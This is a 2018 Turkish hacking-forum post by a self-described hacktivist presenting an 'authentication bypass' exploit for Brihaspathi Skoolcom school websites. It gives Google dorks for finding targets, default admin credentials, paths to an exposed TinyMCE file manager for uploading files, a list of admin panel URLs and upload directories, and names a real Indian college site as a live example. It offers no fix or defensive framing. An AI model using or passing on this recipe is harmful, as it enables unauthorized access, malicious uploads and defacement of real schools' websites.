Konuyu Oyla:
  • Toplam: 1 Oy - Ortalama: 5
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: Brihaspathi Skoolcom India Auth Bypass Exploit
KingSkrupellos
*
avatar
Hacktivist
Durum: Çevrimdışı
Seviye Puanı: 55
Yaşam Puanı: 1,369 / 1,369
Deneyim: 78 / 100
Rep Sayısı: 2742
Mesaj Sayısı: 6282
Üyelik Tarihi: 21.08.2013
     
Yorum: #1
Brihaspathi Skoolcom India Auth Bypass Exploit
06.09.2018 02:58
################################################################################​#################

# Exploit Title : Brihaspathi Skoolcom India Software Development Authentication Bypass Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 06/09/2018
# Vendor Homepages : brihaspathi.com ~ skoolcom.in
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-592 [ Authentication Bypass Issues ] - CWE-264 [Permissions, Privileges, and Access Controls]

################################################################################​#################

# Designed and Developed by Brihaspathi Skoolcom India Software Development Authentication Bypass Vulnerability

# Google Dork :

intext:''Designed and Developed by Brihaspathi''

intext:''Copyright © 2015 DPS Secunderabad. All Rights Reserved.''

# Admin Panel Login Path => /admin/login.php

Username : admin

Password : admin

# MCFileManager Example TinyMCE MoxieCode FileManager Exploit =>

/admin/tiny_mce/plugins/filemanager/pages/fm/index.html
/admin/tiny_mce/plugins/filemanager/examples.html

# Uploaded File Path => ..../admin/tiny_mce/plugins/filemanager/files/....

# Useable Admin Control Panel URL Links =>

/admin/home.php
/admin/imagefolder.php
/admin/latestnews.php
/admin/events.php
/admin/exambranch.php
/admin/news.php
/admin/school.php
/admin/about.php
/admin/curricular.php
/admin/results.php
/admin/ebook.php
/admin/videodetails.php
/admin/change_password.php

# Uploaded File Paths =>

/images/latestnews/....
/images/news/...

################################################################################​#################

# Example Site => avniet.ac.in/admin/tiny_mce/plugins/filemanager/pages/fm/index.html => [ Proof of Concept ] => archive.is/K52wF

################################################################################​#################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

################################################################################​#################

We don't care what people think about us, we are proud of us, we not gonna change for anyone. I do not have own no website. No Contact. # KingSkrupellos # Cyberizm Digital Security Technological Turkish Moslem Army.



Alinti



1 Ziyaretçi